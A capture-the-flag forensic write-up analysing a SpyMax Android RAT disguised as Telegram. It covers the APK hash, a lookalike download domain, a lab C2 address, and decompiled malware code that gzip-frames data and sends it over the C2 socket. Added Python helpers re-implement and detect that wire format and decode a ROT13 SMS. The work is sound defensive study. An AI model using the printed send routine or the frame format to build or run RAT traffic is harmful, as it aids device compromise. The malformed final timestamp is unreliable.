Spymax Telegram Rat LetsDefend Writeup
This write‑up documents how I approached and solved the SpyMax Telegram RAT challenge on LetsDefend.
The scenario involves a victim who attempted to download the Telegram app on their Android device. Instead of using the official Google Play Store, the victim accessed a suspicious website advertising a “faster” download. The victim installed a malicious APK disguised as Telegram, resulting in a potential device compromise. The objective of this investigation was to analyze the APK and uncover key details about the attack.
In short, a user downloaded a malicious APK masquerading as a legitimate application. With that context, let’s dive into the analysis.
Initial Evidence
We are provided with an AD1 image, which stands for AccessData Logical Image. This is a forensic image format generated by tools such as FTK Imager and is commonly used in digital forensics.
What is the SHA-1 hash of the malicious APK file?

By opening the AD1 image in FTK Imager and navigating to the Downloads directory, the malicious APK can be identified. After exporting the APK and calculating its hash using a simple PowerShell command, the SHA‑1 hash is: a192df3e1ee4f74d4078180a465ebc157bbd886b

What type of attack did the victim fall for?
The victim was tricked into downloading a malicious APK that impersonated a trusted app. Impersonation of a legitimate brand is a key signature of phishing attacks.
What is the malicious domain associated with this attack?
This question refers to the domain from which the malicious APK was downloaded. On Android devices the file
    /data/data/com.android.providers.downloads/databases/downloads.db
is an SQLite database that stores metadata about downloaded files.
I exported this database using FTK Imager and opened it with DB Browser for SQLite. Among the various tables, the downloads table contains a uri column, which records the download source. The malicious domain identified in this column is: piay.google.com
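As an added example (not part of the original write-up), the same triage can be scripted: query the downloads table, pull the hostname out of each uri, and flag APKs fetched from hosts that are not trusted or sit one or two edits away from a trusted host, which is exactly how piay.google.com stands out next to play.google.com. The table schema below is a constructed in-memory stand-in with only the columns the query needs, and the trusted-host list is an assumption.

```python
import sqlite3
from urllib.parse import urlsplit

# Hosts a Telegram download is legitimately expected to come from (assumed list).
TRUSTED_HOSTS = {"play.google.com", "telegram.org"}
APK_MIME = "application/vnd.android.package-archive"


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot one-letter lookalikes such as piay vs play."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def build_sample_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for downloads.db; only the columns queried below."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE downloads (_id INTEGER PRIMARY KEY, uri TEXT, _data TEXT, mimetype TEXT)")
    con.executemany(
        "INSERT INTO downloads (uri, _data, mimetype) VALUES (?, ?, ?)",
        [
            ("https://play.google.com/store/apps/details?id=org.telegram.messenger",
             "/sdcard/Download/details.html", "text/html"),
            ("https://piay.google.com/get/Telegram.apk",  # constructed lookalike URL
             "/sdcard/Download/Telegram.apk", APK_MIME),
        ],
    )
    con.commit()
    return con


def triage_downloads(con: sqlite3.Connection) -> list:
    """Return (host, local path, reason) for every download worth a closer look."""
    findings = []
    for uri, path, mime in con.execute("SELECT uri, _data, mimetype FROM downloads"):
        host = (urlsplit(uri).hostname or "").lower()
        is_apk = mime == APK_MIME or (path or "").lower().endswith(".apk")
        lookalike = host not in TRUSTED_HOSTS and any(
            edit_distance(host, t) <= 2 for t in TRUSTED_HOSTS)
        if lookalike:
            findings.append((host, path, "lookalike of a trusted host"))
        elif is_apk and host not in TRUSTED_HOSTS:
            findings.append((host, path, "APK sideloaded from untrusted host"))
    return findings
```

Running triage_downloads(build_sample_db()) reports only the piay.google.com APK; the genuine Play Store page is left alone.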

What is the IP address and port of the Command and Control (C2) server used by the malicious app?
To answer this question, the APK had to be reverse engineered. I used JADX GUI to decompile and inspect the application.
Given the nature of SpyMax, I assumed the malware would communicate with its C2 server either via HTTP or raw sockets. Searching for HTTP-related artifacts did not yield results, but searching for socket-related code did.
Although the code is heavily obfuscated, a key method call stood out:
    vhnvitlsjqhpnpdnttkkdpfhpbikoymknsrbkhwtaggb4244.ad = InetAddress.getByName(split[i]);
InetAddress.getByName resolves a hostname (or parses a dotted IP string) into an IP address, so whatever feeds split[i] is the C2 host.
Further analysis showed that the hostname and port were being parsed from values loaded at runtime. Tracing the variable assignments revealed that these values originate from the strings.xml resource file.

Inspecting strings.xml revealed the C2 server information: 192.168.245.130:7771

What is the name of the function responsible for compressing data in the malicious APK?
The malware compresses data before transmitting it to the C2 server, most likely to reduce the amount of traffic on the wire and to make the payload harder to inspect.
While inspecting socket OutputStream writes, I identified the following code:
    try {
        synchronized (vhnvitlsjqhpnpdnttkkdpfhpbikoymknsrbkhwtaggb4244.y) {
            // build the message to send (see f() below)
            byte[] f = agnaxqpowggbffhkaekewcuxcclwqkwjdjouvkriwwqmkafbpjzcvxcxlpxuetxmjxxwqnpqnchzmincxkhhkunfgrifmwdc4245.f(str, bArr);
            // k is the C2 socket, out is its OutputStream
            vhnvitlsjqhpnpdnttkkdpfhpbikoymknsrbkhwtaggb4244.k.setSendBufferSize(f.length);
            vhnvitlsjqhpnpdnttkkdpfhpbikoymknsrbkhwtaggb4244.out.write(f, 0, f.length);
        }
    } catch (Exception unused) {
        // any failure tears down / resets the connection
        vhnvitlsjqhpnpdnttkkdpfhpbikoymknsrbkhwtaggb4244.di();
    }
The vhnv…ggb4244.out.write call writes data to the socket's output stream, and the data being written is the return value of ag…mdc4245.f:
    public static byte[] f(String str, byte[] bArr) throws Exception {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        // compress the command string and the payload separately
        byte[] cZp = cZp(str.getBytes());
        byte[] cZp2 = cZp(bArr);
        // lengths of both compressed blobs, as ASCII decimal strings
        byte[] bytes = String.valueOf(cZp.length).getBytes();
        byte[] bytes2 = String.valueOf(cZp2.length).getBytes();
        // header: <len1> NUL <len2> NUL
        byteArrayOutputStream.write(bytes, 0, bytes.length);
        byteArrayOutputStream.write(0);
        byteArrayOutputStream.write(bytes2, 0, bytes2.length);
        byteArrayOutputStream.write(0);
        // body: both compressed blobs back to back
        byteArrayOutputStream.write(cZp, 0, cZp.length);
        byteArrayOutputStream.write(cZp2, 0, cZp2.length);
        byte[] byteArray = byteArrayOutputStream.toByteArray();
        try {
            byteArrayOutputStream.close();
        } catch (Exception unused) {
        }
        return byteArray;
    }
This method writes several byte sequences into a ByteArrayOutputStream and returns them as a single byte array: two NUL-terminated ASCII lengths followed by the two blobs they describe. The cZp method stands out here; inspecting it further makes it evident that it is the method doing the compression:
    public static byte[] cZp(byte[] bArr) throws Exception {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(bArr.length);
        // plain GZIP compression of the input buffer
        GZIPOutputStream gZIPOutputStream = new GZIPOutputStream(byteArrayOutputStream);
        gZIPOutputStream.write(bArr);
        gZIPOutputStream.close();
        byte[] byteArray = byteArrayOutputStream.toByteArray();
        byteArrayOutputStream.close();
        return byteArray;
    }
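To make the wire format concrete, the following added example (my own code, not taken from the APK or the challenge) re-implements f()/cZp() in Python, adds the inverse parser an analyst would use on a captured C2 message, and a cheap structural check that a network sensor could apply: two decimal length fields, each terminated by NUL, followed by two GZIP members whose magic bytes sit exactly where the lengths say they should. The function names are mine.

```python
import gzip

GZIP_MAGIC = b"\x1f\x8b"


def czp(data: bytes) -> bytes:
    """Equivalent of the APK's cZp(): gzip the buffer."""
    return gzip.compress(data)


def frame(command: str, payload: bytes) -> bytes:
    """Equivalent of f(str, bArr): ASCII len, NUL, ASCII len, NUL, then both gzip blobs."""
    c1, c2 = czp(command.encode("utf-8")), czp(payload)
    return (str(len(c1)).encode() + b"\x00" +
            str(len(c2)).encode() + b"\x00" + c1 + c2)


def split_header(buf: bytes):
    """Return (len1, len2, body), or None when the two NUL-terminated length fields are missing."""
    try:
        first = buf.index(b"\x00")
        second = buf.index(b"\x00", first + 1)
    except ValueError:
        return None
    l1, l2 = buf[:first], buf[first + 1:second]
    if not (l1.isdigit() and l2.isdigit()):
        return None
    return int(l1), int(l2), buf[second + 1:]


def looks_like_spymax_frame(buf: bytes) -> bool:
    """Structural detection check: decimal lengths that line up with two gzip members."""
    parsed = split_header(buf)
    if parsed is None:
        return False
    len1, len2, body = parsed
    return (len(body) == len1 + len2 and body[:2] == GZIP_MAGIC
            and body[len1:len1 + 2] == GZIP_MAGIC)


def parse_frame(buf: bytes) -> tuple:
    """Inverse of frame(): recover (command, payload) from a captured message."""
    parsed = split_header(buf)
    if parsed is None:
        raise ValueError("missing length header")
    len1, len2, body = parsed
    if len(body) != len1 + len2:
        raise ValueError("length fields do not match body size")
    return (gzip.decompress(body[:len1]).decode("utf-8"),
            gzip.decompress(body[len1:]))
```

Java's GZIPOutputStream and Python's gzip differ only in header metadata (mtime, OS byte), so parse_frame() decompresses either side's output.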
What phone number did the attacker dial?
Similar to the downloads database, the file
    /data/data/com.android.providers.contacts/databases/contacts2.db
holds information related to calls, phone numbers, and contacts.
After opening this database in DB Browser for SQLite and inspecting the calls table, I found a single dialed number: 09436521458754

What is the decryption key that was left by the attacker?
The SMS database is located at:
/data/data/com.android.providers.telephony/databases/mmssms.db
Inspecting this database revealed an SMS sent to the same phone number. The message content is:
Urer vf gur qrpelcgvba xrl: mPyQd9sr0nlgXssda648Y0ZyAwbmxTCp Nccyl vg vzzrqvngryl gb npprff gur svyrf. Pbasvez bapr vg’f qbar.
This closely resembles the output of a Caesar shift. Decoding it produces the following message:
Here is the decryption key: zClDq9fe0aytKffqn648L0MlNjozkGPc Apply it immediately to access the files. Confirm once it’s done.
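Rather than eyeballing the shift, the recovery can be automated. The added example below (my own code, not from the write-up) tries all 26 Caesar shifts on the SMS text quoted above, scores each candidate by how many common English words it contains, and then pulls the key token out of the winning plaintext. The word list is a small assumed one; letters rotate while digits and punctuation pass through, which is why the mixed alphanumeric key survives.

```python
import re

# The SMS body quoted in the write-up, embedded here as the sample input.
SMS = ("Urer vf gur qrpelcgvba xrl: mPyQd9sr0nlgXssda648Y0ZyAwbmxTCp "
       "Nccyl vg vzzrqvngryl gb npprff gur svyrf. Pbasvez bapr vg’f qbar.")

# Small English word list (assumed) used to score candidate shifts.
COMMON_WORDS = {"the", "is", "it", "to", "here", "key", "access",
                "files", "once", "done", "apply", "confirm"}


def caesar_shift(text: str, shift: int) -> str:
    """Rotate a-z and A-Z by `shift`; digits and punctuation pass through unchanged."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def english_score(text: str) -> int:
    """Count alphabetic tokens that are common English words."""
    return sum(1 for w in re.findall(r"[a-z]+", text.lower()) if w in COMMON_WORDS)


def best_shift(ciphertext: str) -> int:
    """Try all 26 shifts and return the one whose plaintext scores highest."""
    return max(range(26), key=lambda s: english_score(caesar_shift(ciphertext, s)))


def extract_key(plaintext: str):
    """Pull the token following 'decryption key:' out of the decoded message."""
    m = re.search(r"decryption key:\s*(\S+)", plaintext, re.IGNORECASE)
    return m.group(1) if m else None


if __name__ == "__main__":
    shift = best_shift(SMS)
    plain = caesar_shift(SMS, shift)
    print(shift, plain)
    print("key:", extract_key(plain))
```

On this message the best shift is 13 (ROT13), and the key token comes out as the one shown in the decoded text above.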
To which location or service does the dialed number belong?
Running a simple Google search for the country code 94 revealed that the number belongs to Sri Lanka.
When was the last time the malicious APK was active?
Inspecting the /data/system/usagestats/0/yearly XML file and searching for the package name, I found it was last active at 17355124949.